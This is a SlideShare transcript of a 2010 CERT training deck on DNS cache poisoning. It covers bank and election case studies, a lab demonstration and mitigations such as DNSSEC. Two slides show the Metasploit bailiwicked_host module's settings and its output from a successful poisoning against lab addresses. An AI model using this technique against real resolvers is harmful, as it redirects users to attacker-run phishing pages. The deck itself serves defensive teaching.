Uploaded byvngundi
930 views

Day 2 Dns Cert 4a Cache Poisoning

- The document describes a demonstration of a DNS cache poisoning attack. It provides instructions for setting up the attack using tools on a Ubuntu VM. The attack spoofs DNS responses to redirect traffic from a domain to a malicious IP address controlled by the attacker. This could enable realistic phishing attacks. Mitigation strategies include DNSSEC, SSL, and monitoring recursive DNS servers, but user awareness remains important.

Embed presentation

Downloaded 39 times
DNS Security for CERTs - Attack Scenarios & Demonstrations – Cache Poisoning Chris Evans Delta Risk, LLC 7 March 2010 1
What You Will Need for the Exercise • Your Ubuntu VM – VMWare Web Console Access – SSH with X11 Forwarding (for Advanced Users) • Do a query for www.tld1 and verify its IP address before the attack is launched: – 192.168.101.50 2
Description • A Change in Recursive DNS Server Causes Spoofed or Incorrect Resolutions – Attack Doesn’t Target Registry Architecture DNS Google.com ISP 1 DNS Fake Google ISP 2 Resolves Differently Than 3
Description • Cache poisoning attacks target a specific DNS server, and therefore, only the users which use that DNS server – This doesn’t fit the “get most bang for the buck” of typical hackers out for fame and glory – BUT, the attack can be very insidious, difficult to detect and completely transparent to the victim • These attacks occur infrequently, or, are just not being detected and reported. 4
Case Study – External Poisoning • Unverified report of a Brazilian bank victimized by cache poisoning attack. • Attack targeted local ISP DNS server • ISP reported only “1%” of its users were affected Eweek.com 4/22/09 5
Case Study – External Poisoning • Hackers poisoned local ISP DNS server and redirected users to a login page that looked just like the Bank’s login page • Solicited usernames, passwords, and other information not normally asked for by the Bank at login Actual Bradesco Login Page 6
Case Study – Internal Poisoning • Partido Colorado – political statement made by one organization against another during an election Attacker Modifies Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 7
Case Study – Internal Poisoning • The local ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org to a state-run news service 201.217.51.114 Attacker Modified Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 8
Attack Demonstration External Poisoning DNS Cache Web Server DNS Server Hacker Normal Request Poisoned Request Victim Web Server 9
Demonstration – Attacker View _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | / _ ) _)/ _ |/___) _ | |/ _ | | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___) |_| =[ msf v3.2-release + -- --=[ 320 exploits - 217 payloads + -- --=[ 20 encoders - 6 nops =[ 99 aux msf auxiliary(bailiwicked_host) > Name: DNS BailiWicked Host Attack Version: 5794 Provided by: I)ruid <druid@caughq.org> hdm <hdm@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME www.tld1 yes Hostname to hijack NEWADDR 192.168.85.5 yes New address for hostname RECONS 192.168.101.10 yes The nameserver used for recon RHOST 192.168.80.10 yes The target address SRCADDR Real yes The source address to use for SRCPORT 53 yes The target server's source TTL 37620 yes The TTL for the malicious host XIDS 0 yes The number of XIDs to try for 10
Demonstration – Attacker View (cont.) [*] Targeting nameserver 192.168.80.10 for injection of www.tld1. as 192.168.85.5 [*] Querying recon nameserver for tld1.'s nameservers... [*] Got an NS record: tld1. 180 IN NS ns1.tld1. [*] Querying recon nameserver for address of ns1.tld1.... [*] Got an A record: ns1.tld1. 180 IN A 192.168.101.10 [*] Checking Authoritativeness: Querying 192.168.101.10 for tld1.... [*] ns1.tld1. is authoritative for tld1., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.0/0.06/0.0 | min/max/avg replies: 0/6/3 [*] Sending 4 spoofed replies from each nameserver (1) for each query [*] Attempting to inject a poison record for www.tld1. into 192.168.80.10:53... ... ... ... ... [*] Poisoning successful after 61000 queries and 250000 responses: www.tld1 == 192.168.85.5 [*] TTL: 37619 DATA: #<Resolv::DNS::Resource::IN::A:0xb6b28688> [*] Auxiliary module execution completed Attack Successful!!!!! 11
Demonstration – Server View • Wireshark Capture – Note the queries like “031PtyJamG6o.tld1” 12
Demonstration – User View • Please open a browser and connect to the webmail server: http://192.168.101.50/squirrelmail – Login as: studentX – Password: password • Examine the message in your inbox – Looks realistic? ( Use your imagination  ) – The URL certainly does – it matches the web registry system URL. • Click on the link (it won’t hurt you!) – Does this look like the login page of the web registry system? 13
Demonstration – User View 1 3 2 May look legit but is the hacker’s IP and webserver!!!!! 14
Impact • Users are dependent on the answers from the DNS being accurate and legitimate • Cache Poisoning can be used to create very realistic phishing attacks, that are more likely to succeed, because they appear to use real URLs. – Users are more attune to “strange” URLs now than several years ago, but cache poisoning allows an attacker to use a “normal” URL 15
Mitigation & Response Strategies • DNSSEC – will mitigate effect of external poisoning attacks, but will not address content “issues” at the authoritative server • SSL-Based Logins – but subject to user participation! • Server validation techniques like “site keys” – but again, subject to user participation! • Proactive monitoring of recursive servers – not necessarily tractable – but maybe useful for High Value Domains 16
Mitigation & Response Strategies • Know WHO to contact at the ISPs within your span of control • Know the procedures for flushing the DNS cache – you may have to instruct operators how to do this! • Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim 17
Questions? ? 18

More Related Content

PPTX
Grey H@t - DNS Cache Poisoning
byChristopher Grayson
 
PDF
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
byAPNIC
 
PDF
Namespaces for Local Networks
byMen and Mice
 
PDF
Windows 2012 and DNSSEC
byMen and Mice
 
PDF
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
byLuke Young
 
PDF
DNS/DNSSEC by Nurul Islam
byMyNOG
 
PDF
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
byMen and Mice
 
PDF
Part 2 - Local Name Resolution in Windows Networks
byMen and Mice
 
Grey H@t - DNS Cache Poisoning
byChristopher Grayson
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
byAPNIC
 
Namespaces for Local Networks
byMen and Mice
 
Windows 2012 and DNSSEC
byMen and Mice
 
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
byLuke Young
 
DNS/DNSSEC by Nurul Islam
byMyNOG
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
byMen and Mice
 
Part 2 - Local Name Resolution in Windows Networks
byMen and Mice
 

What's hot

PDF
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
byOpenDNS
 
PDF
Windows Server 2016 Webinar
byMen and Mice
 
PDF
Understanding and Deploying DNSSEC, by Champika Wijayatunga [APRICOT 2015]
byAPNIC
 
PPTX
Putting Wings on the Elephant
byDataWorks Summit
 
PDF
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
PPTX
Collaborate instant cloning_kyle
byKyle Hailey
 
PDF
How to send DNS over anything encrypted
byMen and Mice
 
PDF
Database Hardware Benchmarking
byCommand Prompt., Inc
 
ODT
RHCE FINAL Questions and Answers
byRadien software
 
PPTX
HKNOG 5.0 - NSEC caching
byAPNIC
 
PDF
Mens jan piet_dnssec-in-practice
bykuchinskaya
 
KEY
Apache Wizardry - Ohio Linux 2011
byRich Bowen
 
PDF
Troubleshooting Tips from a Docker Support Engineer
byJeff Anderson
 
PDF
[India Merge World Tour] Meru Networks
byPerforce
 
PDF
2016 JavaOne Deconstructing REST Security
byDavid Blevins
 
PPTX
Cloudstone - Sharpening Your Weapons Through Big Data
byChristopher Grayson
 
PDF
End-to-End Analysis of a Domain Generating Algorithm Malware Family
byCrowdStrike
 
PDF
2017 dev nexus_deconstructing_rest_security
byDavid Blevins
 
PDF
Yeti DNS - Experimenting at the root
byMen and Mice
 
PDF
Keeping DNS server up-and-running with “runit
byMen and Mice
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
byOpenDNS
 
Windows Server 2016 Webinar
byMen and Mice
 
Understanding and Deploying DNSSEC, by Champika Wijayatunga [APRICOT 2015]
byAPNIC
 
Putting Wings on the Elephant
byDataWorks Summit
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
byShakacon
 
Collaborate instant cloning_kyle
byKyle Hailey
 
How to send DNS over anything encrypted
byMen and Mice
 
Database Hardware Benchmarking
byCommand Prompt., Inc
 
RHCE FINAL Questions and Answers
byRadien software
 
HKNOG 5.0 - NSEC caching
byAPNIC
 
Mens jan piet_dnssec-in-practice
bykuchinskaya
 
Apache Wizardry - Ohio Linux 2011
byRich Bowen
 
Troubleshooting Tips from a Docker Support Engineer
byJeff Anderson
 
[India Merge World Tour] Meru Networks
byPerforce
 
2016 JavaOne Deconstructing REST Security
byDavid Blevins
 
Cloudstone - Sharpening Your Weapons Through Big Data
byChristopher Grayson
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
byCrowdStrike
 
2017 dev nexus_deconstructing_rest_security
byDavid Blevins
 
Yeti DNS - Experimenting at the root
byMen and Mice
 
Keeping DNS server up-and-running with “runit
byMen and Mice
 

Similar to Day 2 Dns Cert 4a Cache Poisoning

PDF
DNS Attacks
byHimanshu Prabhakar
 
PPT
Dns protocol design attacks and security
byMichael Earls
 
PPTX
Network And Application Layer Attacks
byArun Modi
 
PDF
DNS Cache Poisoning
byKourosh Sajjadi
 
PPTX
lecture5.pptxJHKGJFHDGTFGYIUOIUIPIOIPUOHIYGUYFGIH
byAbodahab
 
PPTX
lecture5Ch03-bufferOverFlow-attack.ppt.pptx
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
PDF
SANS xmas 2011 Hacking Submission
byJohnny Vestergaard
 
PDF
Day 2 Dns Cert 4c Malicious Use
byvngundi
 
PDF
Day 2 Dns Cert 4b Name Server Redirection
byvngundi
 
PPTX
IT Infrastrucutre Security
byS Periyakaruppan CISM,ISO31000,C-EH,ITILF
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
PPTX
lecture5.pptx
byLlobarro2
 
PDF
Day 2 Dns Cert 4 Scenarios
byvngundi
 
PDF
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
byChris Gates
 
PDF
Dns Hardening Linux Os
byecarrow
 
PDF
Penetration Testing is the Art of the Manipulation
byJongWon Kim
 
PDF
Hitbkl 2012
byF _
 
PDF
business
byGajendra Saini
 
PPT
Security & ethical hacking
byAmanpreet Singh
 
PDF
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
byClubHack
 
DNS Attacks
byHimanshu Prabhakar
 
Dns protocol design attacks and security
byMichael Earls
 
Network And Application Layer Attacks
byArun Modi
 
DNS Cache Poisoning
byKourosh Sajjadi
 
lecture5.pptxJHKGJFHDGTFGYIUOIUIPIOIPUOHIYGUYFGIH
byAbodahab
 
lecture5Ch03-bufferOverFlow-attack.ppt.pptx
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
SANS xmas 2011 Hacking Submission
byJohnny Vestergaard
 
Day 2 Dns Cert 4c Malicious Use
byvngundi
 
Day 2 Dns Cert 4b Name Server Redirection
byvngundi
 
IT Infrastrucutre Security
byS Periyakaruppan CISM,ISO31000,C-EH,ITILF
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
lecture5.pptx
byLlobarro2
 
Day 2 Dns Cert 4 Scenarios
byvngundi
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
byChris Gates
 
Dns Hardening Linux Os
byecarrow
 
Penetration Testing is the Art of the Manipulation
byJongWon Kim
 
Hitbkl 2012
byF _
 
business
byGajendra Saini
 
Security & ethical hacking
byAmanpreet Singh
 
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
byClubHack
 

More from vngundi

PDF
Day 1 Enisa Setting Up A Csirt
byvngundi
 
PDF
Cyber Security Strategies and Approaches
byvngundi
 
PDF
Day 2 Dns Cert 3 Dns Organizations
byvngundi
 
PDF
Anatomy of a CERT - Gordon Love, Symantec
byvngundi
 
PDF
Day 1 Coop Banks
byvngundi
 
PDF
Day 1 Large Scale Attacks
byvngundi
 
PDF
Day 1 From CERT To NCSC
byvngundi
 
PDF
Dealing With Security Threats
byvngundi
 
Day 1 Enisa Setting Up A Csirt
byvngundi
 
Cyber Security Strategies and Approaches
byvngundi
 
Day 2 Dns Cert 3 Dns Organizations
byvngundi
 
Anatomy of a CERT - Gordon Love, Symantec
byvngundi
 
Day 1 Coop Banks
byvngundi
 
Day 1 Large Scale Attacks
byvngundi
 
Day 1 From CERT To NCSC
byvngundi
 
Dealing With Security Threats
byvngundi
 

Recently uploaded

PDF
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
PDF
December Patch Tuesday
byIvanti
 
PDF
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
PPTX
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PPT
software-security-intro in information security.ppt
byismaeelsahib032
 
PDF
API-First Architecture in Financial Systems
bycyy111112
 
PPTX
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
PPTX
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
PDF
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
PDF
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
PPTX
AI in Cybersecurity: Digital Defense by Yasir Naveed Riaz
byYasir Naveed Riaz
 
PDF
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
PPTX
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
PPTX
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
PDF
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
PPTX
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
December Patch Tuesday
byIvanti
 
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
software-security-intro in information security.ppt
byismaeelsahib032
 
API-First Architecture in Financial Systems
bycyy111112
 
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
AI in Cybersecurity: Digital Defense by Yasir Naveed Riaz
byYasir Naveed Riaz
 
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 

Day 2 Dns Cert 4a Cache Poisoning

  • 1.
    DNS Security forCERTs - Attack Scenarios & Demonstrations – Cache Poisoning Chris Evans Delta Risk, LLC 7 March 2010 1
  • 2.
    What You WillNeed for the Exercise • Your Ubuntu VM – VMWare Web Console Access – SSH with X11 Forwarding (for Advanced Users) • Do a query for www.tld1 and verify its IP address before the attack is launched: – 192.168.101.50 2
  • 3.
    Description • A Changein Recursive DNS Server Causes Spoofed or Incorrect Resolutions – Attack Doesn’t Target Registry Architecture DNS Google.com ISP 1 DNS Fake Google ISP 2 Resolves Differently Than 3
  • 4.
    Description • Cache poisoningattacks target a specific DNS server, and therefore, only the users which use that DNS server – This doesn’t fit the “get most bang for the buck” of typical hackers out for fame and glory – BUT, the attack can be very insidious, difficult to detect and completely transparent to the victim • These attacks occur infrequently, or, are just not being detected and reported. 4
  • 5.
    Case Study –External Poisoning • Unverified report of a Brazilian bank victimized by cache poisoning attack. • Attack targeted local ISP DNS server • ISP reported only “1%” of its users were affected Eweek.com 4/22/09 5
  • 6.
    Case Study –External Poisoning • Hackers poisoned local ISP DNS server and redirected users to a login page that looked just like the Bank’s login page • Solicited usernames, passwords, and other information not normally asked for by the Bank at login Actual Bradesco Login Page 6
  • 7.
    Case Study –Internal Poisoning • Partido Colorado – political statement made by one organization against another during an election Attacker Modifies Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 7
  • 8.
    Case Study –Internal Poisoning • The local ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org to a state-run news service 201.217.51.114 Attacker Modified Upstream DNS Records www.partidocolorado.org. 3600 IN A 66.249.01.121 8
  • 9.
    Attack Demonstration External Poisoning DNS Cache Web Server DNS Server Hacker Normal Request Poisoned Request Victim Web Server 9
  • 10.
    Demonstration – AttackerView _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | / _ ) _)/ _ |/___) _ | |/ _ | | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___) |_| =[ msf v3.2-release + -- --=[ 320 exploits - 217 payloads + -- --=[ 20 encoders - 6 nops =[ 99 aux msf auxiliary(bailiwicked_host) > Name: DNS BailiWicked Host Attack Version: 5794 Provided by: I)ruid <druid@caughq.org> hdm <hdm@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME www.tld1 yes Hostname to hijack NEWADDR 192.168.85.5 yes New address for hostname RECONS 192.168.101.10 yes The nameserver used for recon RHOST 192.168.80.10 yes The target address SRCADDR Real yes The source address to use for SRCPORT 53 yes The target server's source TTL 37620 yes The TTL for the malicious host XIDS 0 yes The number of XIDs to try for 10
  • 11.
    Demonstration – AttackerView (cont.) [*] Targeting nameserver 192.168.80.10 for injection of www.tld1. as 192.168.85.5 [*] Querying recon nameserver for tld1.'s nameservers... [*] Got an NS record: tld1. 180 IN NS ns1.tld1. [*] Querying recon nameserver for address of ns1.tld1.... [*] Got an A record: ns1.tld1. 180 IN A 192.168.101.10 [*] Checking Authoritativeness: Querying 192.168.101.10 for tld1.... [*] ns1.tld1. is authoritative for tld1., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.0/0.06/0.0 | min/max/avg replies: 0/6/3 [*] Sending 4 spoofed replies from each nameserver (1) for each query [*] Attempting to inject a poison record for www.tld1. into 192.168.80.10:53... ... ... ... ... [*] Poisoning successful after 61000 queries and 250000 responses: www.tld1 == 192.168.85.5 [*] TTL: 37619 DATA: #<Resolv::DNS::Resource::IN::A:0xb6b28688> [*] Auxiliary module execution completed Attack Successful!!!!! 11
  • 12.
    Demonstration – ServerView • Wireshark Capture – Note the queries like “031PtyJamG6o.tld1” 12
  • 13.
    Demonstration – UserView • Please open a browser and connect to the webmail server: http://192.168.101.50/squirrelmail – Login as: studentX – Password: password • Examine the message in your inbox – Looks realistic? ( Use your imagination  ) – The URL certainly does – it matches the web registry system URL. • Click on the link (it won’t hurt you!) – Does this look like the login page of the web registry system? 13
  • 14.
    Demonstration – UserView 1 3 2 May look legit but is the hacker’s IP and webserver!!!!! 14
  • 15.
    Impact • Users aredependent on the answers from the DNS being accurate and legitimate • Cache Poisoning can be used to create very realistic phishing attacks, that are more likely to succeed, because they appear to use real URLs. – Users are more attune to “strange” URLs now than several years ago, but cache poisoning allows an attacker to use a “normal” URL 15
  • 16.
    Mitigation & ResponseStrategies • DNSSEC – will mitigate effect of external poisoning attacks, but will not address content “issues” at the authoritative server • SSL-Based Logins – but subject to user participation! • Server validation techniques like “site keys” – but again, subject to user participation! • Proactive monitoring of recursive servers – not necessarily tractable – but maybe useful for High Value Domains 16
  • 17.
    Mitigation & ResponseStrategies • Know WHO to contact at the ISPs within your span of control • Know the procedures for flushing the DNS cache – you may have to instruct operators how to do this! • Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim 17
  • 18.